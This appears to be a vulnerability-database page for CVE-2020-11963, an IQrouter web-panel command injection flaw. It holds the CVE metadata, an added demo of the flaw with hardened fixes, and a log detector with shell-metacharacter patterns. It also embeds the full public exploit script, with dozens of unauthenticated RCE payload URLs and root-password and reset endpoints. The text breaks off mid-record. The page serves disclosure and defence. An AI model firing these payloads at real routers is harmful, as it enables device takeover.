Description
** DISPUTED ** IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection (CWE-78). Note: The vendor claims that this vulnerability can only occur on a brand-new network, before the forced initial configuration (which has a required step for setting a secure password on the system) has been completed, and that this makes the CVE invalid. The vendor adds that the same is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”. Note, however, that the public exploit referenced in this record (EDB-ID:48358, PACKETSTORM:157300) splits its payload list into a group labelled "RCE without auth" and a group labelled "RCE (router need to be in setup mode)", so whether a given endpoint is still reachable on a configured device should be checked rather than assumed.
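The injection shape this record describes, as an added illustration (this is not IQrouter's code and not the exploit author's code): a hypothetical CGI handler splices a query value into a /bin/sh command string, and the public exploit's payload shape (a single quote to close the quoted argument, backticks for command substitution, `${IFS}` in place of a space) turns that into command execution. The `vlan_tag` parameter is taken from the exploit's payload list; the handler itself, its use of `printf` as a stand-in for the real command, and the 1..4094 allowlist are assumptions for the example. The two hardened variants show why `shlex.quote` neutralises the payload and why validate-then-argv (no shell at all) is the better fix.

```python
"""Command-injection shape behind CVE-2020-11963 (added illustration, not IQrouter code)."""
import re
import shlex
import subprocess
from urllib.parse import parse_qs, urlsplit

# Constructed request in the shape the public exploit uses for /vlanTag: a single quote
# closes the shell-quoted argument, backticks run a command, ${IFS} stands in for a space.
SAMPLE_URL = "/cgi-bin/luci/er/vlanTag?vlan_tag='`echo${IFS}INJECTED`'"

VLAN_TAG_RE = re.compile(r"[1-9][0-9]{0,3}")  # allowlist: 1..4094 as plain decimal digits


def vlan_tag_from_url(url: str) -> str:
    """Return the vlan_tag query value exactly as a CGI handler would receive it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("vlan_tag", [""])[0]


def run_unsafe(vlan_tag: str) -> str:
    """Hypothetical vulnerable handler (CWE-78): the raw value is spliced into a /bin/sh
    command string. printf stands in for whatever the real handler executes; the defect
    is the string concatenation plus the shell, not the program being called."""
    cmd = "printf '[%s]' '" + vlan_tag + "'"
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def run_quoted(vlan_tag: str) -> str:
    """Mitigation when a shell is unavoidable: shlex.quote turns the value into one literal
    word, so the quote-and-backtick payload is printed back instead of executed."""
    cmd = "printf '[%s]' " + shlex.quote(vlan_tag)
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def valid_vlan_tag(vlan_tag: str) -> bool:
    """Allowlist check: reject anything that is not a VLAN ID in 1..4094."""
    return bool(VLAN_TAG_RE.fullmatch(vlan_tag)) and int(vlan_tag) <= 4094


def run_hardened(vlan_tag: str) -> str:
    """Preferred fix: validate against the allowlist, then pass the value as a single argv
    element with no shell in between, so metacharacters have nothing to act on."""
    if not valid_vlan_tag(vlan_tag):
        raise ValueError("rejected vlan_tag: %r" % vlan_tag)
    return subprocess.run(["printf", "[%s]", vlan_tag], capture_output=True, text=True).stdout


if __name__ == "__main__":
    tag = vlan_tag_from_url(SAMPLE_URL)
    print("unsafe  :", run_unsafe(tag))   # [INJECTED]  -> the injected command ran
    print("quoted  :", run_quoted(tag))   # ['`echo${IFS}INJECTED`']  -> literal, not executed
    print("valid?  :", valid_vlan_tag(tag), valid_vlan_tag("100"))  # False True
    print("hardened:", run_hardened("100"))  # [100]
```

Run it as a script to see the three behaviours side by side. The exploit's own hint ("use TABS or ${IFS} for space") is visible in the unsafe case: the attacker never needs a literal space, so filtering spaces or a handful of characters is not a fix; only quoting every value, or better, never invoking a shell, removes the bug class.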
Affected Software
Related
{"id": "CVE-2020-11963", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-11963", "description": "** DISPUTED ** IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is \u201ctrue for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time\u201d.", "published": "2020-04-21T13:15:00", "modified": "2020-11-30T19:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11963", "reporter": "cve@mitre.org", "references": ["https://evenroute.com/", "https://pastebin.com/grSCSBSu", 
"https://evenroute.zendesk.com/hc/en-us/articles/216107838-How-do-I-configure-an-IQrouter-", "https://openwrt.org/docs/guide-quick-start/walkthrough_login"], "cvelist": ["CVE-2020-11963"], "immutableFields": [], "lastseen": "2022-03-23T12:25:41", "viewCount": 75, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA"]}, {"type": "exploitdb", "idList": ["EDB-ID:48358"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157300"]}, {"type": "zdt", "idList": ["1337DAY-ID-34278"]}], "rev": 4}, "score": {"value": 2.1, "vector": "NONE"}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:5468BBEF-DC01-4DCA-9191-83F7000E6F39", "AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA"]}], "wildExploited": true}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA"]}, {"type": "exploitdb", "idList": ["EDB-ID:48358"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157300"]}, {"type": "zdt", "idList": ["1337DAY-ID-34278"]}]}, "affected_software": {"major_version": [{"name": "evenroute iqrouter firmware", "version": 3}]}, "vulnersScore": 2.1}, "_state": {"wildexploited": 0, "dependencies": 1659876597, "score": 1659818015, "affected_software_major_version": 1671590614}, "_internal": {"score_hash": "51b9e5b0bf35b0a09da9ebb02c175afc"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:evenroute:iqrouter_firmware:3.3.1"], "cpe23": ["cpe:2.3:o:evenroute:iqrouter_firmware:3.3.1:*:*:*:*:*:*:*"], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "evenroute:iqrouter_firmware", "version": "3.3.1", "operator": "le", "name": "evenroute iqrouter firmware"}], "affectedConfiguration": [{"name": "evenroute iqrouter", "cpeName": "evenroute:iqrouter", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, 
"cpe23Uri": "cpe:2.3:o:evenroute:iqrouter_firmware:3.3.1:*:*:*:*:*:*:*", "versionEndIncluding": "3.3.1", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:evenroute:iqrouter:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://evenroute.com/", "name": "https://evenroute.com/", "refsource": "MISC", "tags": ["Product"]}, {"url": "https://pastebin.com/grSCSBSu", "name": "https://pastebin.com/grSCSBSu", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://evenroute.zendesk.com/hc/en-us/articles/216107838-How-do-I-configure-an-IQrouter-", "name": "https://evenroute.zendesk.com/hc/en-us/articles/216107838-How-do-I-configure-an-IQrouter-", "refsource": "MISC", "tags": []}, {"url": "https://openwrt.org/docs/guide-quick-start/walkthrough_login", "name": "https://openwrt.org/docs/guide-quick-start/walkthrough_login", "refsource": "MISC", "tags": []}]}
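The record above links the public exploit (EDB-ID:48358 / PACKETSTORM:157300), which drives every payload through unauthenticated GET requests to `/cgi-bin/luci/er/...` with backticks and `${IFS}` in query values or positional path segments, and which also lists plain state-changing endpoints such as `reset_password`, `diag_set_password` and `index?reset_config=1`. Below is an access-log detector for that traffic, added here as an example and not part of this record or of the vendor's software. The log lines are constructed; the endpoint and parameter names come from the exploit's payload list; the Common Log Format layout is an assumption about how the router's or a fronting proxy's access log would look.

```python
"""Log-side detector for the CVE-2020-11963 request pattern (added example, not vendor code)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in Common Log Format (addresses from documentation ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Apr/2020:10:00:01 +0000] "GET /cgi-bin/luci/er/index HTTP/1.1" 200 5120
192.0.2.10 - - [21/Apr/2020:10:00:02 +0000] "GET /cgi-bin/luci/er/screen9?save_creds=1&s1=home&s2=guest&p1=pw1&p2=pw2 HTTP/1.1" 200 90
192.0.2.10 - - [21/Apr/2020:10:00:03 +0000] "GET /cgi-bin/luci/er/vlanTag?vlan_tag='%60id%60' HTTP/1.1" 200 312
192.0.2.10 - - [21/Apr/2020:10:00:04 +0000] "GET /cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'%60uname%24%7BIFS%7D-a%60'/ HTTP/1.1" 200 44
198.51.100.7 - - [21/Apr/2020:10:00:05 +0000] "GET /cgi-bin/luci/er/reset_password/ HTTP/1.1" 200 17
198.51.100.7 - - [21/Apr/2020:10:00:06 +0000] "GET /cgi-bin/luci/er/index?reset_config=1 HTTP/1.1" 200 17
198.51.100.7 - - [21/Apr/2020:10:00:07 +0000] "GET /favicon.ico HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PREFIX = "/cgi-bin/luci/er/"
# Shell metacharacters the exploit relies on (backticks, ${IFS}) plus their usual siblings.
SHELL_META = re.compile(r"[`;|\n]|\$\(|\$\{")
# Endpoints and parameters the exploit lists as unauthenticated state-changing actions.
SENSITIVE_ENDPOINTS = {"reset_password", "diag_set_password"}
SENSITIVE_PARAMS = {"reset_config", "reboot", "upgrade"}


def inspect_target(target: str):
    """Classify one request target; returns (reason, endpoint, evidence) or None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if not path.startswith(PREFIX):
        return None
    segments = path[len(PREFIX):].split("/")
    endpoint = segments[0]
    params = parse_qsl(parts.query, keep_blank_values=True)
    # Values reach the handlers both as query parameters (vlanTag, screen9, wifi ...)
    # and as positional path segments (diag_wifi, diag_set_static_wan, diag_pppoe ...).
    values = segments[1:] + [v for _, v in params]
    hits = [v for v in values if SHELL_META.search(v)]
    if hits:
        return ("shell-metachar", endpoint, hits)
    if endpoint in SENSITIVE_ENDPOINTS:
        return ("sensitive-endpoint", endpoint, [])
    flagged = [k for k, _ in params if k in SENSITIVE_PARAMS]
    if flagged:
        return ("sensitive-action", endpoint, flagged)
    return None


def scan(log_text: str):
    """Return one finding per suspicious line, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = inspect_target(m.group("target"))
        if verdict is None:
            continue
        reason, endpoint, evidence = verdict
        findings.append({"src": m.group("src"), "ts": m.group("ts"),
                         "endpoint": endpoint, "reason": reason, "evidence": evidence})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["src"], f["reason"], f["endpoint"], f["evidence"])
```

The benign `screen9?save_creds=...` line is deliberately included: it is the legitimate setup-wizard call that the exploit abuses, so matching on endpoint names alone would flag every first-time configuration. Decoding before matching matters too; the injection characters arrive percent-encoded (`%60`, `%24%7B`) and a raw-string grep for a backtick misses them.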
{"attackerkb": [{"lastseen": "2023-01-05T11:11:46", "description": "** DISPUTED ** IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is \u201ctrue for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time\u201d.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-11963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11963"], "modified": "2020-11-30T00:00:00", "id": "AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA", "href": "https://attackerkb.com/topics/gYul2kDmyf/cve-2020-11963", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-20T03:53:26", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2020-04-21T00:00:00", "type": "zdt", "title": "IQrouter 3.3.1 Firmware - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11968", "CVE-2020-11966", "CVE-2020-11963", "CVE-2020-11964", "CVE-2020-11967"], "modified": "2020-04-21T00:00:00", "id": "1337DAY-ID-34278", "href": "https://0day.today/exploit/description/34278", "sourceData": "# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution\r\n# Exploit Author: drakylar\r\n# Vendor Homepage: https://evenroute.com/\r\n# Software Link: https://evenroute.com/iqrouter\r\n# Version: IQrouter firmware up to 3.3.1\r\n# Tested on: IQrouter firmware 3.3.1\r\n# CVE : N/A \r\n\r\n#!/usr/bin/env python3\r\nimport argparse\r\nfrom sys import argv, exit\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"Install requests lib! pip3 install requests\")\r\n\r\n\r\nprint(\"\"\"\r\n#######################################################################\r\n# IQrouter multiple RCE and other vulnerabilities #\r\n# by drakylar (Shaposhnikov Ilya) #\r\n# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #\r\n# CVE-2020-11967 CVE-2020-11968 #\r\n#######################################################################\r\n\"\"\")\r\n\r\n\r\nrce_setup = [\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'\",\r\n \"RCE /vlanTag (vlan_tag param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'\",\r\n \"RCE /verify_wifi (wifi_conflict param). 
Need hide_wifi_config != true\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2\",\r\n \"RCE /screen9 (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2\",\r\n \"RCE /screen9 (s1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'\",\r\n \"RCE /screen9 (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2\",\r\n \"RCE /screen9 (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen4?save_isp='`{}`\",\r\n \"RCE /screen4 (save_isp param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'\",\r\n \"RCE /screen2 set_wan_modem_interfaces param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'\",\r\n \"RCE /screen2 find_ip_address_conflict param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_question='`{}`'\",\r\n \"RCE /screen10 (set_security_question param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1\",\r\n \"RCE /screen10 (set_security_answer param)\"],\r\n [\r\n \"/cgi-bin/luci/er/screen1?zonename='`{}`'\",\r\n \"RCE /screen1 (zonename param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/register?email=`{}`\",\r\n \"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)\"\r\n ]\r\n]\r\n\r\nrce_any = [\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1\",\r\n \"RCE /wifi (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (s1 param)\"\r\n ],\r\n [\r\n 
\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'\",\r\n \"RCE /wifi (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4\",\r\n \"RCE /wifi (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_5g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_2g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guest_key param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7\",\r\n \"RCE /wifi (enable_guestwifi param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123\",\r\n \"RCE /screen11.1 (email param)\"\r\n ],\r\n [\r\n 
\"/cgi-bin/luci/er/reboot_link?link='`{}`'\",\r\n \"RCE /reboot_link (link param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/\",\r\n \"RCE /diag_wifi (htm5ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/\",\r\n \"RCE /diag_wifi (htm2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/\",\r\n \"RCE /diag_wifi (c5ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/\",\r\n \"RCE /diag_wifi (c2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/\",\r\n \"RCE /diag_set_static_wan (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/\",\r\n \"RCE /diag_set_static_wan (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/\",\r\n \"RCE /diag_set_static_wan (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/\",\r\n \"RCE /diag_set_static_wan (dns param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/\",\r\n \"RCE /diag_set_static_modem (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/\",\r\n \"RCE /diag_set_static_modem (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/\",\r\n \"RCE /diag_set_static_modem (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/\",\r\n \"RCE /diag_set_device_name_and_sync (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/\",\r\n \"RCE /diag_set_device_name (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/\",\r\n \"RCE /diag_pppoe_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/\",\r\n \"RCE /diag_pppoe (wan_username param)\"\r\n ],\r\n 
[\r\n \"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/\",\r\n \"RCE /diag_pppoa_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/\",\r\n \"RCE /diag_pppoa (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/advanced_link?link='`{}`'\",\r\n \"RCE /advanced_link (link param)\"\r\n ]\r\n\r\n]\r\n\r\nadvanced_payloads = [\r\n [\r\n \"/cgi-bin/luci/er/reboot_link?reboot=1\",\r\n \"Reboot IQrouter (/reboot_link reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?reboot=1\",\r\n \"Reboot IQrouter (/screen2 reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/index?reset_config=1\",\r\n \"Reset IQrouter (/index reset_config param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen7?upgrade=1\",\r\n \"Upgrade IQrouter (/screen7 upgrade param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?restart_network=1\",\r\n \"Restart network (/vlanTag restart_network param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/start\",\r\n \"Start iperf script (/diag_iperf_cmd/start)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/stop\",\r\n \"Stop iperf script (/diag_iperf_cmd/stop)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/get_syslog\",\r\n \"Router setup info log (/get_syslog)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_password/c00lpasswd/\",\r\n \"Change root password to c00lpasswd (can change in code)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/reset_password/\",\r\n \"Change root password to 'changeme' (static)\"\r\n ]\r\n]\r\n\r\n\r\ndef print_payloads():\r\n print('#' * 30)\r\n print(\"Payloads list\")\r\n num = 1\r\n print('######################### RCE without auth 
########################')\r\n for payload in rce_any:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '############### RCE (router need to be in setup mode) ###############')\r\n for payload in rce_setup:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '######################### Advanced payloads #########################')\r\n for payload in advanced_payloads:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n\r\nparser = argparse.ArgumentParser(description=\"IQrouter multiple RCE\")\r\nparser.add_argument('--host', help='Host', type=str)\r\nparser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)\r\nparser.add_argument('-n', '--num', help='Payload number',\r\n default=0, type=int)\r\nparser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',\r\n default=\"pwd\", type=str)\r\nparser.add_argument('--protocol', help='Protocol (http/https)',\r\n default=\"http\", type=str)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\ndef main():\r\n print(\"\")\r\n full_payload_list = rce_setup + rce_any + advanced_payloads\r\n payloads_amount = len(full_payload_list)\r\n try:\r\n hostname = args.host\r\n port = args.port\r\n payload_num = int(args.num)\r\n bash_cmd = args.cmd\r\n protocol = args.protocol\r\n\r\n if payload_num < 1 or payload_num > payloads_amount:\r\n print(\"Error with payload number!\")\r\n raise IndexError\r\n if port < 0 or port > 65535:\r\n print(\"Error with port number\")\r\n raise IndexError\r\n if protocol not in ['http', 'https']:\r\n print(\"Error with protocol name\")\r\n raise IndexError\r\n\r\n current_payload = full_payload_list[payload_num - 1]\r\n print(\"Payload: {}\".format(current_payload[1]))\r\n print(\"Host: {}\".format(hostname))\r\n print(\"Port: {}\".format(port))\r\n print(\"Protocol: {}\".format(protocol))\r\n print(\"Command: {}\".format(bash_cmd))\r\n\r\n full_url = \"{}://{}:{}{}\".format(protocol, hostname, 
port,\r\n current_payload[0].format(bash_cmd))\r\n print(\"Built URL: {}\".format(full_url))\r\n\r\n r = requests.get(full_url)\r\n print(\"Status code: {}\".format(r.status_code))\r\n return\r\n except IndexError:\r\n parser.print_help()\r\n print_payloads()\r\n exit(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\r\n \"\\n\\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.\")\r\n exit(main())\n\n# 0day.today [2020-07-20] #", "sourceHref": "https://0day.today/exploit/34278", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T04:10:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-21T00:00:00", "type": "exploitdb", "title": "IQrouter 3.3.1 Firmware - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": 